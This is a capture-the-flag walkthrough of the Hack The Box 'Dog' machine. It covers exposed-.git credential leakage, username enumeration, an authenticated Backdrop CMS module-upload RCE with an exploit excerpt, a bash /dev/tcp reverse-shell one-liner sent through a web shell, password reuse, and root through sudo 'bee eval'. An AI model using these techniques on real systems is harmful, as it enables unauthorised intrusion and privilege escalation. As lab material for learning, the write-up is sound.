#hackthebox #linux #easy

![[Pasted image 20250823000619.png]]

# Information Gathering - Nmap

As always, I started off by scanning all TCP ports and discovered 22 and 80.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -Pn -n --open --min-rate 3000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-22 02:09 UTC
Nmap scan report for 10.10.11.58
Host is up (0.052s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 16.75 seconds
```

Then a service and default-script scan against those two ports to gather more detail.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sCV -p 22,80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-22 02:10 UTC
Nmap scan report for 10.10.11.58
Host is up (0.049s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_  256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-git:
|   10.10.11.58:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: todo: customize url aliases. reference:https://docs.backdro...
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Home | Dog
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.03 seconds
```

Finally, a UDP scan of the top 10 ports. Nothing useful here: `open|filtered` on 1434/udp only means Nmap got no reply for that probe.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sU --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-22 02:11 UTC
Nmap scan report for 10.10.11.58
Host is up (0.048s latency).

PORT     STATE         SERVICE
53/udp   closed        domain
67/udp   closed        dhcps
123/udp  closed        ntp
135/udp  closed        msrpc
137/udp  closed        netbios-ns
138/udp  closed        netbios-dgm
161/udp  closed        snmp
445/udp  closed        microsoft-ds
631/udp  closed        ipp
1434/udp open|filtered ms-sql-m

Nmap done: 1 IP address (1 host up) scanned in 4.84 seconds
```

---

# Enumeration

##### HTTP - TCP 80

`Nmap` already returned a lot of information on port 80. Let's go through it one item at a time.

```bash
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-git:
|   10.10.11.58:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: todo: customize url aliases. reference:https://docs.backdro...
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Home | Dog
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
```

The site on port 80 is all about dogs.

![[Pasted image 20250821211622.png]]

The page footer confirms it is built with `Backdrop CMS`.

![[Pasted image 20250821211825.png]]

We saw that `/robots.txt` lists a number of paths and that `/.git` is exposed. Let's check them out.

![[Pasted image 20250821212107.png]]

`/.git`

![[Pasted image 20250821212655.png]]

An exposed `.git` directory means the full source history can be reconstructed, so I dumped the whole repository with `git-dumper`:

```bash
git-dumper http://$IP/.git git_loot
```

`git log` revealed a single commit.
The downside of this repo is its size: it contains the whole CMS tree, and reading through every file would take a long time.

```bash
┌──(kali㉿kali)-[~/Desktop/git_loot]
└─$ git log
commit 8204779c764abd4c9d8d95038b6d22b6a7515afa (HEAD -> master)
Author: root <[email protected]>
Date:   Fri Feb 7 21:22:11 2025 +0000

    todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
```

In `settings.php`, I found a set of credentials for the `mysql` database: `root:BackDropJ2024DS2024`

![[Pasted image 20250821220218.png]]

The credentials didn't work on `/login`. That makes sense, since they are for the `mysql` service, but password reuse is always worth testing. More interestingly, the site answered `sorry, unrecognized username` when I submitted them. A message that specifically complains about the username suggests the form returns a different message for a username that actually exists, which is a username-enumeration primitive.

![[Pasted image 20250821220625.png]]

While manually going through the files, I found the exact version of `Backdrop CMS`. There is surely a quicker way to find it; Nmap's `http-generator` line only reported the major version, `Backdrop CMS 1`.

```bash
┌──(kali㉿kali)-[~/…/git_loot/core/profiles/minimal]
└─$ cat minimal.info
name = Minimal
description = Start with only a few modules enabled.
version = BACKDROP_VERSION
backdrop = 1.x
type = profile
hidden = TRUE

dependencies[] = node
dependencies[] = dblog
dependencies[] = layout

; Added by Backdrop CMS packaging script on 2024-03-07
project = backdrop
version = 1.27.1
timestamp = 1709862662
```

A web search shows a known vulnerability for this version of Backdrop CMS: an authenticated remote code execution through a malicious module upload (the exploit used later is `52021.py`).

![[Pasted image 20250821215716.png]]

Putting everything together, I concluded that the next step is to find a valid username on the `/?q=user/login` page, by brute force if necessary.
The reasoning is as follows: I have a valid set of `mysql` credentials and an exploit that should work against this CMS version, but the exploit is an authenticated RCE, so I first need to log in to the CMS. The only password I have is the `mysql` one, so I am hoping a CMS user reused it. Then again, I found two users by grepping the dumped repository recursively for `@dog.htb`, so I may not need to brute-force usernames at all if either `dog` or `tiffany` works on the website.

```bash
┌──(kali㉿kali)-[~/Desktop/git_loot]
└─$ grep -r '@dog.htb' .
./.git/logs/HEAD:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <[email protected]> 1738963331 +0000	commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
./.git/logs/refs/heads/master:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <[email protected]> 1738963331 +0000	commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
./files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json:    "[email protected]"
```

The server reports the usernames `dog` and `root` as unrecognized.

![[Pasted image 20250821224140.png]]

![[Pasted image 20250821224158.png]]

But it returns a different message for `tiffany`, so that account exists.

![[Pasted image 20250821223758.png]]

With the `mysql` password, I successfully logged into `/?q=admin/dashboard` as `tiffany`.

![[Pasted image 20250821224332.png]]

# Initial Access - Shell as `www-data`

Now that we are authenticated, let's prepare and perform the RCE. The exploit's `main` function directs me to go to `/admin/modules/install`.
```python
# Excerpt from 52021.py; create_files() and create_zip() are defined elsewhere in the exploit.
def main(url):
    print("Backdrop CMS 1.27.1 - Remote Command Execution Exploit")
    time.sleep(3)
    print("Evil module generating...")
    time.sleep(2)
    info_path, php_path = create_files()
    zip_filename = create_zip(info_path, php_path)
    print("Evil module generated!", zip_filename)
    time.sleep(2)
    print("Go to " + url + "/admin/modules/install and upload the " + zip_filename + " for Manual Installation.")
    time.sleep(2)
    print("Your shell address:", url + "/modules/shell/shell.php")
```

However, `/admin/modules/install` leads nowhere on this target. As with every other path on this site, the route has to be given as a query string: `/?q=admin/modules/install`.

![[Pasted image 20250822230748.png]]

![[Pasted image 20250822230912.png]]

Since the upload form only accepts `tar tgz gz bz2`, I have to pack the module into one of those formats instead of the `.zip` the exploit produces. I'll use tar. Running the unmodified exploit creates a `shell` directory and a `shell.zip` file.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ python3 52021.py http://$IP
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.zip
Go to http://10.10.11.58/admin/modules/install and upload the shell.zip for Manual Installation.
Your shell address: http://10.10.11.58/modules/shell/shell.php
```

The `shell` directory contains two files, `shell.info` and `shell.php`:

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ ls shell
shell.info  shell.php
```

Since `.zip` is not accepted, I pack the directory with `tar` instead:

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ tar -cvf shell.tar shell
shell/
shell/shell.info
shell/shell.php
```

`shell.tar` uploads successfully.

![[Pasted image 20250822231921.png]]

After uploading the archive, navigate to `/modules/shell/shell.php` to verify that command execution works as expected.

![[Pasted image 20250822233445.png]]

Entering `bash -c 'bash -i >& /dev/tcp/10.10.14.47/443 0>&1'` through the web shell triggers a reverse shell back to my listener. The IP and port in the payload must match the listener you are actually running; the session below was caught on 10.10.14.9 port 1234, so the payload has to point there.
Got a reverse shell as `www-data`.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.11.58] 32802
bash: cannot set terminal process group (902): Inappropriate ioctl for device
bash: no job control in this shell
www-data@dog:/var/www/html/modules/shell$ whoami
whoami
www-data
```

Besides `root`, two users have a login shell: `jobert` and `johncusack`.

```bash
www-data@dog:/tmp$ cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
jobert:x:1000:1000:jobert:/home/jobert:/bin/bash
johncusack:x:1001:1001:,,,:/home/johncusack:/bin/bash
```

Both have home directories under `/home`.

```bash
www-data@dog:/home$ ls
jobert  johncusack
```

I tried reusing the password found earlier, `BackDropJ2024DS2024`, against both users.

```bash
www-data@dog:/home$ su jobert
Password:
su: Authentication failure
```

The password worked for `johncusack`.

```bash
www-data@dog:/home$ su johncusack
Password:
johncusack@dog:/home$ whoami
johncusack
```

# Privilege Escalation - shell as `root`

`sudo -l` reveals that `johncusack` can execute `/usr/local/bin/bee` as any user with `sudo`.

```bash
johncusack@dog:/home$ sudo -l
[sudo] password for johncusack:
Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee
```

```bash
johncusack@dog:/home$ ls -l /usr/local/bin/bee
lrwxrwxrwx 1 root root 26 Jul  9  2024 /usr/local/bin/bee -> /backdrop_tool/bee/bee.php
```

Running `bee` prints a help menu with a lot of subcommands.

```bash
johncusack@dog:/home$ bee
04:56:22 [173/173] 🐝 Bee
Usage: bee [global-options] <command> [options] [arguments]

Global Options:
 --root
 Specify the root directory of the Backdrop installation to use. If not set, will try to find the Backdrop installation automatically based on the current directory.

 --site
 Specify the directory name or URL of the Backdrop site to use (as defined in 'sites.php'). If not set, will try to find the Backdrop site automatically based on the current directory.

 --base-url
 Specify the base URL of the Backdrop site, such as https://example.com. May be useful with commands that output URLs to pages on the site.

 --yes, -y
 Answer 'yes' to questions without prompting.

 --debug, -d
 Enables 'debug' mode, in which 'debug' and 'log' type messages will be displayed (in addition to all other messages).
```

At the very bottom of the help page there is an `eval` subcommand, which executes arbitrary PHP code after bootstrapping Backdrop. Since `bee` runs as `root` under `sudo`, that PHP runs as `root` too.

```bash
eval
 ev, php-eval
 Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop.
```

However, `eval` did not work at first. Note that its argument is the PHP code itself, not a file name; the second error is not about `hello.php` but about `bee` failing to bootstrap Backdrop.

```bash
johncusack@dog:/home$ sudo bee eval
 ✘  Argument 'code' is required.

johncusack@dog:/home$ sudo bee eval hello.php
 ✘  The required bootstrap level for 'eval' is not ready.
```

`status` confirms the cause: run from `/home`, `bee` cannot find a Backdrop installation.

```bash
johncusack@dog:/home$ sudo bee status
 ⚠  No Backdrop installation found. Run this command again from within a Backdrop installation, or use the '--root' global option.
```

I moved to `/var/www/html`, ran `sudo bee status` again, and this time it returned proper values.
```bash
johncusack@dog:/home$ cd /var/www/html
johncusack@dog:/var/www/html$ sudo bee status
 Backdrop CMS            1.27.1
 Bee version             1.x-1.x
 Bee root directory      /backdrop_tool/bee
 Site root directory     /var/www/html
 Site type               Single
 Database                mysql
 Database name           backdrop
 Database username       root
 Database password       **********
 Database host           127.0.0.1
 Database port
 Cron last run           2025-08-23 04:06:52 GMT+0000
 Install time            2024-07-09 18:12:15 GMT+0000
 Maintenance mode        off
 Update last check       2025-02-07 21:12:04 GMT+0000
 Settings.php path       /var/www/html/settings.php
 Drupal compatibility    on
 Config storage active   /var/www/html/files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active
 Config storage staging  /var/www/html/files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/staging
 Site name               Dog
 Default theme           basis
 Admin theme             seven
 Public files path       /var/www/html/files
 Temporary files path    /tmp
 Preprocess CSS          on
 Preprocess JS           on
 Theme debug             off
 Error display level     hide
 PHP cli version         7.4.3-4ubuntu2.28
 PHP ini path            /etc/php/7.4/cli/php.ini
```

With Backdrop bootstrapped, I spawned a shell as `root` through the `eval` subcommand. Passing `--root /var/www/html` as a global option (see the help above) would have achieved the same from any directory.

```bash
johncusack@dog:/var/www/html$ sudo bee eval 'system("bash")'
root@dog:/var/www/html# whoami
root
```

Found `root.txt`:

```bash
root@dog:~# cat root.txt
458...
```

I also grabbed `user.txt` from `/home/johncusack`:

```bash
root@dog:/home/johncusack# cat user.txt
f5b...
```